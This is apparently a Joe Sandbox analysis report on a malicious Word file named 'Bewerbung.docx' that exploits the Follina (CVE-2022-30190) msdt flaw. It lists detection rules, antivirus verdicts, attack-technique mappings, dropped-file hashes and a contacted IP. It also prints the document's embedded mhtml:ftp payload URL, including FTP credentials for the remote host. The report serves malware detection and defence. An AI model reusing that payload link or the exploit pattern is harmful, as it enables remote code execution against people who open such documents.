      Source: dump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: dump.pcap, type: PCAPMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: Bewerbung.docxReversingLabs: Detection: 20%
      Source: Bewerbung.docxVirustotal: Detection: 9%
      Source: Bewerbung.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Bewerbung.docx
      Source: Bewerbung.docxOLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$werbung.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmpJump to behavior
      Source: classification engineClassification label: mal88.troj.expl.evad.winDOCX@1/17@0/1
      Source: Bewerbung.docxOLE document summary: title field not present or empty
      Source: Bewerbung.docxOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Bewerbung.docxInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Source: document.xml.relsExtracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Exploitation for Client Execution
      Path InterceptionPath Interception1
      Masquerading
      OS Credential Dumping1
      File and Directory Discovery
      Remote ServicesData from Local System1
      Exfiltration Over Alternative Protocol
      1
      Non-Standard Port
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
      System Information Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Ingress Tool Transfer
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Bewerbung.docx21%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
      Bewerbung.docx10%VirustotalBrowse
      Bewerbung.docx7%MetadefenderBrowse
      Bewerbung.docx100%AviraHEUR/CVE-2021-40444.Gen
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html100%AviraJS/CVE-2022-30190.G
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.27.134.11
      unknownUnited Kingdom
      34119WILDCARD-ASWildcardUKLimitedGBtrue
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:705530
      Start date and time:2022-09-19 15:34:12 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 40s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Bewerbung.docx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal88.troj.expl.evad.winDOCX@1/17@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .docx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28553090913786805
      Encrypted:false
      SSDEEP:48:I34RBgNXaoz6Wcu9c6GlATvxNRUkrMbN4MimN4MiOH:K4LgNrzuuXtLJqpZH
      MD5:2D73449B8D78DAFA350E2652E58AF474
      SHA1:6E3C44B9DA465478D5F6F07145482724E39A41A6
      SHA-256:7F0DC5AE0300037B2B3E97E869C9EA73500D73A3C810A9B022143E04F580BB5C
      SHA-512:3ECF997132E0FCA6D45580A27BB682C28497DA14894C557B2625ED58F43B688CC553F70D59ED9EEFED6D0DFB3D7E4432BDADDEC52DEA553D8FD614CF8772B68A
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zqU2].m.J..3...&.S,...X.F...Fa.q............................].._0.lJ.u!................l.,-A....@....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6720713633463717
      Encrypted:false
      SSDEEP:192:FvMf8tp+QSl8ULTGLkcmExgnq+5Zp+5T9+rP9+:kWp2vo7mExSpgo
      MD5:5D36EB1ABCA971358AC104A295292725
      SHA1:8ED156E62B7C2EF65A0A1252D39E08C49FA48141
      SHA-256:92F5408A7D38930462F4A66DA8C31684D0C2264426AE7D06647A8CA495E307AD
      SHA-512:CC79F3A6B20D7C0469C76A7B62E89C696D2C2E67ECE8D7CF525032D6EA644DCEEEC997B08BCA2FDA2D58EA13090FF6FE7633C544392CDF9AD0660FA4063DF6F8
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.....&uA..%.~eYS,...X.F...Fa.q............................NM..fO.D.*5.<D..........u|..r.!B...Y.f...S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.8916224090210916
      Encrypted:false
      SSDEEP:3:yVlgsRlzRlJBWhEyhWcuUlcvk+g276:yPblzRlJu9u3bg22
      MD5:904561837AE59053F954C3C7828A2A63
      SHA1:0035CEB2E2449BF184BB89A46386CC0CD0201836
      SHA-256:57D90584E6B6FCB107D3BCF20DBD70773A700FC727A18B29C2701235D7F256E4
      SHA-512:829AEA35A9EDF8B61BADC8769A71A4CA22A149C20C2C232F7640D6900427B00F9D2E3205ADCDC803E9BE417DF3F0FA6A2D0058AEF5D70F6DB80A2B55B050A9F3
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.6.1.2.F.5.D.A.A.-.5.4.7.D.-.4.B.9.D.-.9.9.1.1.-.6.A.0.F.5.1.2.8.5.0.D.5.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.2850661294615317
      Encrypted:false
      SSDEEP:96:K/P/WLs0/rkja/XVYN0gqGosqkIQbQv6yq1twIETA0cxQhWtwIETA0cxQhEH:AXWA0HwObQbQnrY
      MD5:AC6D9560CA10163B754804E863E1E5E5
      SHA1:72C08B794D79345CE8E17FA8D5005CF1A67F585E
      SHA-256:B34F7673B5C3F4BED3C0CC8A566207A84C910FDEADC5AC85A32BF9AEC8761580
      SHA-512:A6902E20C87623EB721891CCD33C3296B9F982857A43D50BE8427927FDBC334225AC8AFE82B0783987C69664F54668BEC2CE801288FB9D32B9BDF2F53269E9D8
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z>V.,...B../.'d..S,...X.F...Fa.q..............................c....H.@.....s........0...LK+L.Fd.V.&.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22160280736493287
      Encrypted:false
      SSDEEP:24:I35qNo1LwnM0B34npbWaXHL9kR8b02vlA1WCYDbsMS1yTD24:I35qNo1UrBoZxsG5mkPa1yT
      MD5:64B95E0F62B9F6BB131176B2CF71E0AF
      SHA1:BD9F5A43DDC9F468A3C538AFED622EA1299F5C8E
      SHA-256:E9E42D6B3C84C359B965E508E4F11B78812F5F3306A719811A2CC78C91BE41A1
      SHA-512:E8A9CF3D11B14D5D3B0BD82C8E6443F5FF20043AB87BFBAE9FF69646089FE0BE353D460DAABA36AFE144C64DC39E0E3783F5A4825890BE38E088C43686A9640F
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.....'NN....*./!S,...X.F...Fa.q.............................(*.."C..Ma.../........t%..~zGC........P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.8775027557365576
      Encrypted:false
      SSDEEP:3:yVlgsRlz3lIXHSlM5WDc7kHYzgBYcrQKDjfIRZ276:yPblzCCl1Dc7kEgBxERf22
      MD5:1C0214F722586BE1CFFAF7B15F2BC0FD
      SHA1:493EDB15BDFE8EBE97DB3F14A4E37EC1B5478509
      SHA-256:6510BEDC2A940AD220C76F4E7D5906003C1B257B5CA24AF4245519EFB7C5689F
      SHA-512:730377EC11600B7BBDC08666012A81BD90AF1F1B14BE4AE153134BA144A595E30E534D74E517BE3C09CA738B070539B69B8BB3CCBCBFAC99238B7CF9622E452B
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.9.A.8.D.A.0.0.8.-.E.4.8.F.-.4.9.F.D.-.8.7.D.E.-.F.E.7.9.6.5.1.4.F.8.C.9.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:modified
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Joe Security
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:false
      Reputation:low
